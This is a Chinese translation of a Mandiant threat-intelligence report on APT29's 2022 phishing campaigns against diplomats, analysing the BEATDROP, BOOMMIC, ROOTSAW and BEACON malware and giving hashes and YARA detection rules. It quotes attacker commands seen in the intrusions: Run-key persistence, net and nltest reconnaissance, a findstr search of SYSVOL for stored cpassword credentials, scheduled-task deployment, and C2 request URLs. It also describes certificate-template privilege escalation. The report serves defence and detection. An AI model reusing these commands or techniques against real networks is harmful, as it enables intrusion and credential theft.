本文主要讨论了对2022年发现的两个新恶意软件家族BEATDROP和BOOMMIC的近期观察,以及APT29组织通过重组和滥用Atlassian的Trello服务来逃避检测的方法。
APT29是一个俄罗斯的间谍组织,可能由外国情报局(SVR)提供赞助。近期检测到的活动以外交为中心的目标与俄罗斯的战略重点以及历史上的APT29目标一致。在UNC2652和UNC2542等多个集群下跟踪到的此类入侵活动于2022年4月并入APT29,同时一些APT29活动也被微软公开称为Nobelium。
从2022年1月中旬开始,Mandiant检测并响应了针对外交主体的APT29网络钓鱼活动,发现了BEATDROP和BOOMMIC下载器的部署和使用。在识别此活动后不久,Mandiant发现了APT29通过一系列网络钓鱼浪潮发起的针对多个其他外交和政府的攻击。
APT29发送的钓鱼邮件伪装成与各大使馆有关的行政通知,并利用合法的第三方邮件地址发送电子邮件,并通过Atlassian的Trello服务进行指挥和控制通信(C2)。这些网络钓鱼邮件与之前的2021年诺贝尔网络钓鱼活动类似,它们以外交机构为目标,使用ROOTSAW(公开称为EnvyScout)提供额外的有效载荷,并滥用Firebase或DropBox进行C2通信。对合法网络服务(如Trello、Firebase或DropBox)的滥用很可能是为了加大检测或补救的难度。
2022年2月,当APT29从部署BEATDROP(使用第三方云服务来获取BEACON)转向使用更简单的、依赖于协同基础设施的BEACON drop时,就实现了一种操作上的转变。接下来的章节将重点介绍APT29在其最新的钓鱼活动中使用的战术、技术、过程以及工具。
图2:2022年确定的活动攻击生命周期
为了访问受害者环境,APT29发送了伪装成大使馆行政更新的鱼叉式网络钓鱼邮件。这些钓鱼邮件使用的是合法但被窃取的其他外交实体的电子邮件地址,并使用一个被称做ROOTSAW的恶意HTML投放器发送给大量的使馆收件人员。该投放器利用一种称为HTML请求夹带的技术将IMG或ISO文件传送到受害者系统。
图3:APT29网络钓鱼诱饵,附有Covid.html文件
打开时,ROOTSAWHTMLdropper会将IMG或ISO文件写入磁盘。在Windows10或更高版本上,双击时会装载映像文件,并且会在Windows资源管理器中将映像文件作为文件夹内容呈现给用户。该图像文件包含两个附加文件,一个Windows快捷方式(LNK)文件和一个恶意DLL。如果用户单击LNK文件,“Target”命令将正常执行。这种机制诱使受害者打开LNK文件,从而无意中启动了恶意DLL。
如同Didier Stevens报告中指出的那样,映像文件中包含的文件(如已安装的ISO文件)将不包含Zone.IdentifierAlternateDataStream(ADS)标志,该标志指示文件已从Internet下载(所谓的“网络标记”)。这可以防止从ISO或IMG图像文件打开文件时,出现Windows操作系统警告消息。
图4:用诱饵的“Covid”LNK快捷方式代替恶意DLL
2021年活动中的LNK与APT29早期活动中使用的LNK具有多个相同的特征,包括使用特定的图标位置、机器ID和MAC地址。APT29使用的一种技术,是LNK文件扩展名使用与对应的目标应用程序或文档不同的图标,从而使快捷方式显示为文档而不是要启动的程序。这会诱使受害者打开看似合法的文档。默认情况下,快捷方式文件也隐藏了它们的LNK文件扩展名,即使启用了Windows资源管理器“显示文件扩展名”,这也进一步降低了打开快捷方式而不是文档的怀疑。
[icon_location] {'string': 'C:\windows\System32\imageres.dll'}
|
[location_info] local_path: C:WindowsSystem32rundll32.exe
[command_line_arguments] string: trello.dll Trello
|
Mandiant还发现APT29利用恶意docx交付HTA dropper,从而在一个单独但类似的网络钓鱼活动中在目标系统上交付和执行BEATDROP。
BEATDROP是一个用C语言编写的下载器,它使用Trello作为 C2。执行后,BEATDROP首先将自己的`ntdll.dll`副本映射到内存中,以便在自己的进程中执行shellcode。BEATDROP首先使用指向NtCreateFile的RtlCreateUserThread创建一个挂起的线程。
在此之后,BEATDROP将枚举系统的用户名、计算机名和IP地址。此信息用于创建受害者ID,BEATDROP使用该ID从其C2存储和提取受害者有效负载。创建受害者ID后,BEATDROP将向Trello发出初始请求,以确定当前受害者是否已被入侵。识别受害者是否已经被入侵的过程从一个GET请求开始,该请求从以下URL检索用户ID:
|
https://api.trello.com/1/members/me/boards?key=<redacted>&token=<redacted>
|
BEATDROP然后使用从图8中的URL收到的用户ID列出与用户相关的Board,其中包含所有当前的受害者。
|
https://api.trello.com/1/boards/<user_id>/lists?key=<redacted>&token=<redacted>
|
图9:BEATDROP用户ID Board URL
BEATDROP枚举受害主Board以确定当前目标是否存在于数据库中。如果当前受害者不在数据库中,那么BEATDROP会编写一个POST请求,使用主机枚举的数据将受害者添加到数据库中。
"name": "usernamencomputernamenip_address",
|
一旦识别出受害者或将其添加到数据库中,BEATDROP将发送请求以收集当前目标的受害者Board:
|
https://api.trello.com/1/lists/<list_id>/cards?key=<redacted>&token=3<redacted>
|
BEATDROP然后将枚举响应以确定当前受害者是否存在有效负载。如果有,BEATDROP将发送一个请求来确定获取最终有效负载的URL。最终URL将传递AES加密的有效负载作为其响应。
|
https://api.trello.com/1/cards/<redacted>/attachments?key=<redacted>&token=<redacted>
|
图12:BEATDROP受害者附件Board URL
|
https://trello.com/1/cards/<redacted>/attachments/<redacted>/download/<payload name>
|
对于上述对TrelloAPI的大多数请求,作为URL参数插入的密钥和令牌足以从Trello API获取信息。然而,在使用下载API的情况下,Trello需要使用也嵌入在BEATDROP示例中的标头:
|
Authorization: OAuth oauth_consumer_key="<redacted>", oauth_token="<redacted>"
|
对早期BEATDROP样本的分析发现,该恶意软件在与其C2通信时使用了一个有趣的用户代理。最初的用户代理字符串与Apple iPad相关,后来的BEATDROP样本中发生了TTP的转变,使用的是更常见的Windows用户代理字符串。
|
Mozilla/5.0 (iPad; CPU OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1
|
图16:BEATDROP将shellcode写入内存
BEATDROP是APT29继续努力混淆其活动并保持持久访问的理想示例。在利用BEATDROP攻击外交实体的多次网络钓鱼浪潮之后,APT29在他们最近针对外交实体的活动中,从BEATDROP转移到了一种新型C++ BEACON加载程序。有几种情况可以解释工具的这种转变,包括在能力方面BEATDROP对团队来说不再具有价值,或者为逃避检测而定期更新工具的TTP操作策略。
在成功部署BEATDROP以交付和执行有效载荷之后,APT29利用BOOMMIC在环境中进一步建立立足点。BOOMMIC,也被微软称为VaporRage,是一个用C语言编写的shellcode下载器,它通过HTTP与用于C2的选定基础设施进行通信。APT29通过合法Java二进制文件jucheck.exe对修改后的version.dll进行DLL侧加载来执行BOOMMIC。
APT29在成功执行BEATDROP后的几分钟内首次部署了BOOMMIC,部署文件包括BOOMMIC 的 DLL文件javafx_font.dll(363a95777f401df40db61148593ea387)以及另外两个文件:
-
jucheck.exe (da24b2783758ff5ccc2d0f5ebcc2a218)
-
version.dll (8bb3d91b666813372e66903209bd45fd)
在执行BOOMMIC之前,APT29通过“JavaUpdate”的注册表项创建持久性,该注册表项将从包含version.dll和BOOMMIC有效负载的目录中执行jucheck.exe。
|
reg add "HKCUsoftwareMicrosoftWindowsCurrentVersionRun" /v "Java Update" /t REG_SZ /d "c:users<redacted>appdatalocalJavajucheck.exe"
|
|
wmic process call create "c:users<redacted>appdatalocalJavajucheck.exe"
|
Version.dll和jucheck.exe都是用于启动BOOMMIC的重要部分。Jucheck.exe是一个合法的Java二进制文件,用于检查任何更新。该文件将在执行时加载version.dll。Version.dll是一个已签名的合法Windows DLL修改后的未签名副本,通常位于%SYSTEMROOT%System32下,但保留其PE标头。修改后的version.dll中添加了一个额外的导入项,它从javafx_font.dll导入恶意函数。
图20:Version.dll导入的CFFExplorer视图,左边是原始的,右边是修改后的DLL,在恶意DLL的导入表中添加了额外的javafx_font.dll
version.dll在导入BOOMMIC时,也会执行BOOMIC的DllMain函数,如图21所示。
如果没有启动其目录中存在的修改后的version.dll,执行jucheck.exe将不会导致BOOMMIC运行。
BOOMMIC,类似于微软之前关于VaporRage的报告,包含多个导出功能。在363a95777f401df40db61148593ea387的情况下,包含BOOMMIC主要功能的导出函数是Java_com_sun_javafx_font_PrismFontFactory_getLCDContrastWin32。
BOOMMIC的主要功能是将shellcode有效负载下载并加载到目标的内存中。一旦执行,BOOMMIC首先检查它是否在jucheck.exe进程下运行,如果不是,程序将退出。通过分析BOOMMIC发现,整个程序中的字符串都使用XOR编码,字节由0x0C和0x4D交替。
如果恶意软件在jucheck.exe下运行,它将为受感染的目标创建一个主机ID,以在下载有效负载的请求中使用。主机ID是通过对目标系统的DNS域和旧账户名进行十六进制编码来创建的。然后,这些值按以下方式格式化:<dns_domain>_<account_name>。其中,<dns_domain>和<account_name>都通过将每个字符的序号加3进行了重新编码。
创建主机ID后,BOOMMIC将此值传递给用于下载和执行有效负载的函数,以用作请求的一部分。BOOMMIC然后向其C2发送GET请求以下载并执行shellcode有效负载。Mandiant观察到APT29利用受感染的网站作为BOOMMIC的C2。成功下载有效负载后,进行XOR解码然后在内存中执行它。
|
https://maybyrne[.]co[.]uk/modules/mod_search/mod_global_search.php?bin_data=<host_id>&Article=AboutMe
|
图25:BOOMMICGET请求示例,将受感染的网站用作C2
Mandiant观察到,一旦建立访问权限,APT29就会迅速升级其在域内的权限。在多种情况下,APT29能够在初始网络钓鱼负载执行后不到12小时内获得域管理员权限。APT29使用各种TTP来提升他们的权限,比如,票据传递(PasstheTicket)攻击或离线破解Kerberos票证。
APT29还利用错误配置的证书模板允许他们冒充管理员用户。从这里开始,APT29创建了额外的恶意证书,用于在环境中横向移动。这种最近的技术在SpecterOps的一份报告中有详细记录,并于2021年8月在Blackhat上展示,它使攻击者能够在环境中快速提升他们的权限,但也提供了一种通过创建恶意软件来实现长期持久性的方法证书。
下面简要概述了APT29在Mandiant调查的实际攻击行动中使用的技术。
Microsoft提供“活动目录证书服务”(ADCS),用于提供证书注册、吊销和信任设置。它允许为给内部HTTPS站点、VPN、基于证书的身份验证等颁发证书设置所需的“公钥基础设施”(PKI)。
ADCS将启用生成新证书时使用的“证书模板”的设置。APT29滥用的特定错误配置(被SpecterOps称为ESC1)允许低权限用户直接升级到域管理员。与这种特定的滥用案例相关,证书模板上的三个不同设置很重要:
在多种情况下,攻击者发现了具有“域用户”注册权限的证书模板,这意味着所有用户都可以请求证书,包括“客户端身份验证”的用法,意味着证书可用于验证用户,以及允许主题和SAN的设置由请求者指定(“ENROLLEE_SUPPLIES_SUBJECT”)。
当使用Kerberos使用对ActiveDirectory执行身份验证时,如果发起身份验证(PKINIT)的Kerberos流采用公钥加密方式,域控制器将根据身份验证主体的用户主体名称(UPN)验证SAN。因此,允许指定任意SAN允许证书的请求者模拟域中的任何主体。
这些设置允许攻击者使用低权限账户请求证书,并在SAN字段中指定高权限账户,并使用此证书进行身份验证。除了上述创建证书之外,实际步骤是将证书与票证授予票证(TGT)请求一起使用,然后使用该TGT进行身份验证。
除了这个示例之外,链接的SpecterOps文档还提供了更多详细信息和附加技术。
在APT29建立访问权限后,Mandiant观察到该组织对主机和ActiveDirectory环境进行了广泛的侦察。还观察到该小组在进行主机侦察以寻找凭据。
首先使用的命令之一是windows下的net命令。APT29广泛使用net命令枚举用户和组。
|
net use
net localgroup Administrators
net1 localgroup Administrators
net user /domain <redacted>
net group /domain "Enterprise Admins"
|
|
C:\WINDOWS\system32\cmd.exe /C nltest /dclist:DOMAIN
|
APT29采用的一个值得注意的TTP是搜索存储在SYSVOL中的密码。此技术依赖于作为组策略首选项的一部分存储的密码。以这种方式存储的密码使用易于解密的已知方案进行加密。Microsoft在MS14-025中修复了此问题,删除了使用“cpassword”配置组策略首选项的选项。虽然补丁是在2014年发布的,但仍然可能会遇到密码存储在组策略首选项中的系统,这可能是因为补丁从未应用过,或者是因为补丁没有删除包含密码的现有组策略首选项(如Microsoft所做的那样不冒破坏现有功能的风险)。
|
C:WINDOWSsystem32cmd.exe /C findstr /S /I cpassword \DOMAINsysvolDOMAINpolicies*.xml
|
Mandiant观察到APT29在环境中快速横向移动。为了促进横向移动,APT29依赖于用于模拟特权用户的恶意证书和SMB BEACON的组合。
在看到将SMB BEACON分期部署到多个系统后,首次观察到APT29横向移动。为了便于在远程系统上部署BEACON,APT29使用了一个恶意证书,该证书允许他们冒充特权用户。在成功执行BOOMMIC后不久,通过本地暂存zip文件可以看到部署SMB BEACON的第一个证据。
|
powershell -c "expand-archive SharedReality.zip SharedReality.dll"
|
对SharedReality.dll的分析确定它是一个用Go语言编写的仅在内存释放的下载器,可解密并执行嵌入式BEACON有效负载。BEACON有效负载被识别为SMB BEACON,它通过以下命名管道进行通信:
|
\.pipeSapIServerPipes-1-15-21-07836
|
图30:SharedReality.dll命名管道
然后观察到APT29利用特权用户的身份将SharedReality.dll复制到多个系统的Temp目录。然后,通过一个名为SharedRealitySvcDLC的计划任务部署它,该任务已安装并执行。执行计划任务后,该任务随即被删除。
|
schtasks /create /s <REDACTED> /tn "SharedRealitySvcDLC" /ru SYSTEM /tr "C:WindowsSystem32rundll32.exe c:WindowsTempSharedReality.dll warn_fwalk_maxunicode" /sc onstart
|
如前所述,Mandiant观察到该组织广泛使用计划任务、运行的注册表键值、恶意证书和内存后门,在某些情况下,用于每个系统的手段有多个。这些技术和工具的使用代表了APT29尝试在环境中维护访问的多种方式。Mandiant发现的活动进一步支持了这一点,在该活动中,APT29编写的zip文件中包含了Kerberos票证以及用于(文件???)创建和导出的恶意证书。
APT29使用的全部TTP支持这样的评估,即APT29在这些活动中的目标是建立多种长期访问手段,以促进在目标外交实体的受害者网络内为间谍目的收集情报。
这一最新的鱼叉式网络钓鱼浪潮展示了APT29在从世界各国政府获取外交和外交政策信息方面的持久利益。从BEATDROP到BEACON的转变进一步凸显了该组织通过遵循明显模式的鱼叉式网络钓鱼活动来改变其TTP和改变BEACON交付机制的努力。
Mandiant预计APT29会持续一波网络钓鱼活动,这些活动使用新的工具和基础设施来阻碍检测。虽然这些活动可能针对外交使团和外交政策信息,作为该组织支持俄罗斯战略利益的任务的一部分,但入侵乌克兰以及西方、欧洲和俄罗斯之间的紧张局势可能会影响其强度和紧迫性的收集操作。
在这次网络钓鱼活动中,Mandiant观察到APT29利用以下恶意软件系列:
-
BEATDROP是一个用C语言编写的下载器,它使用Atlassian的C&C项目管理服务Trello。BEATDROP使用Trello存储受害者信息并获取要执行的AES加密的shellcode有效负载。BEATDROP然后将下载的有效负载注入到挂起的进程中并执行。
-
执行时,BEATDROP将ntdll.dll的副本映射到内存中,以在自己的进程中执行shellcode。该示例然后使用RtlCreateUserThread创建一个挂起的线程,该线程指向NtCreateFile。该示例将执行更改为shellcode并恢复线程。shellcode有效负载是从Trello获取的,并针对每个受害者。一旦有效负载被检索到,它就会从Trello中删除。
-
BOOMMIC,也被称为VaporRage,是一个用C语言编写的shellcode下载器,通过HTTPS进行通信。Shellcode Payload是从硬编码C2中获取的,该C2使用从目标域和账户名生成的编码host_id。BOOMMICXOR在内存中解码下载的shellcode有效载荷并执行它。
-
BOOMMIC由jucheck.exe通过侧加载执行技术执行名为javafx_font.dll的恶意BOOMMIC载荷完成加载
-
ROOTSAW,也被称为EnvyScout,是一个HTML文件形式的下载程序,其中嵌入的ISO/IMG文件经过XOR和Base64解码后包含了可以进一步执行的Javascript。
-
BEACON是一个用C/C++编写的后门,它是CobaltStrike框架的一部分。支持的后门命令包括shell命令执行、文件传输、文件执行和文件管理。BEACON还可以捕获击键和屏幕截图以及充当代理服务器。BEACON还可能负责收集系统凭据、端口扫描和枚举网络上的系统。BEACON通过HTTP或DNS与C2服务器通信。
|
恶意软件家族
|
MD5
|
SHA256
|
|
ROOTSAW
|
2f712cdae87cdb7ccc0f4046ffa3281d
|
207132befb085f413480f8af9fdd690ddf5b9d21a9ea0d4a4e75f34f023ad95d
|
|
ROOTSAW
|
4ae0b6be7f38e2eb84b881abf5110edc
|
538d896cf066796d8546a587deea385db9e285f1a7ebf7dcddae22f8d61a2723
|
|
ROOTSAW
|
628799f1f8146038b488c9ed06799b93
|
a896c2d16cadcdedd10390c3af3399361914db57bde1673e46180244e806a1d0
|
|
BEATDROP
|
6ac740ebf98df7217d31cb826a207af6
|
2f11ca3dcc1d9400e141d8f3ee9a7a0d18e21908e825990f5c22119214fbb2f5
|
|
BEATDROP
|
a0b4e7622728c317f37ae354b8bc3dbb
|
8bdd318996fb3a947d10042f85b6c6ed29547e1d6ebdc177d5d85fa26859e1ca
|
|
BEATDROP
|
e031c9984f65a9060ec1e70fbb84746b
|
95bbd494cecc25a422fa35912ec2365f3200d5a18ea4bfad5566432eb0834f9f
|
|
BOOMMIC
|
363a95777f401df40db61148593ea387
|
8cb64b95931d435e01b835c05c2774b1f66399381b9fa0b3fb8ec07e18f836b0
|
|
BEACON–DLL
|
37ea95f7fa8fb51446c18f9f3aa63df3
|
6ee1e629494d7b5138386d98bd718b010ee774fe4a4c9d0e069525408bb7b1f7
|
|
BEACON–ISO Dropper
|
97fa94e60ccc91dcc6e5ee2848f48415
|
3cb0d2cff9db85c8e816515ddc380ea73850846317b0bb73ea6145c026276948
|
|
BEACON–LNK Launcher
|
da1787c54896a926b4893de19fd2554c
|
fdce78f3acfa557414d3f2c6cf95d18bdb8de1f6ffd3585256dfa682a441ac04
|
|
BEACON–DLL
|
8716cec33a4fea1c00d57c4040945d9e
|
e8da0c4416f4353aad4620b5a83ff84d6d8b9b8a748fdbe96d8a4d02a4a1a03c
|
|
BEACON–ISO Dropper
|
4af2a3d07062d5d28dad7d3a6dfb0b4b
|
34e7482d689429745dd3866caf5ddd5de52a179db7068f6b545ff51542abb76c
|
|
BEACON–LNK Launcher
|
c23f1af6d1724324f866fe68634396f9
|
e5de12f16af0b174537bbdf779b34a7c66287591323c2ec86845cecdd9d57f53
|
|
rule M_APT_Downloader_BEATDROP
{
meta:
author = "Mandiant"
description = "Rule looking for BEATDROP malware"
strings:
$ntdll1 = "ntdll" ascii fullword
$ntdll2 = "C:\Windows\System32\ntdll.dll" ascii fullword nocase
$url1 = "api.trello.com" ascii
$url2 = "/members/me/boards?key=" ascii
$url3 = "/cards?key=" ascii
condition:
uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and filesize < 1MB and all of them
}
|
|
import "pe"
rule M_APT_Downloader_BOOMMIC {
meta:
author = "Mandiant"
description = "Rule looking for BOOMMIC malware"
strings:
$loc_10001000 = { 55 8B EC 8D 45 0C 50 8B 4D 08 51 6A 02 FF 15 [4] 85 C0 74 09 B8 01 00 00 00 EB 04 EB 02 33 C0 5D C3 }
$loc_100012fd = {6A 00 8D 55 EC 52 8B 45 D4 50 6A 05 8B 4D E4 51 FF 15 }
$func1 = "GetComputerNameExA" ascii
$func2 = "HttpQueryInfoA" ascii
condition:
uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550 and filesize < 1MB and
(
($loc_10001000 and $func1) or
($loc_100012fd and $func2)
)
}
|
参考链接:www.mandiant.com/resources/tracking-apt29-phishing-campaigns
编辑|靖蓉琦
审校|何双泽、金矢
本文为CNTIC编译整理,不代表本公众号观点,转载请保留出处与链接。联系信息进入公众号后点击“关于我们”可见。
![Trello:跟踪APT29网络钓鱼活动]( "Trello:跟踪APT29网络钓鱼活动")
原文始发于微信公众号(国家网络威胁情报共享开放平台):Trello:跟踪APT29网络钓鱼活动
评论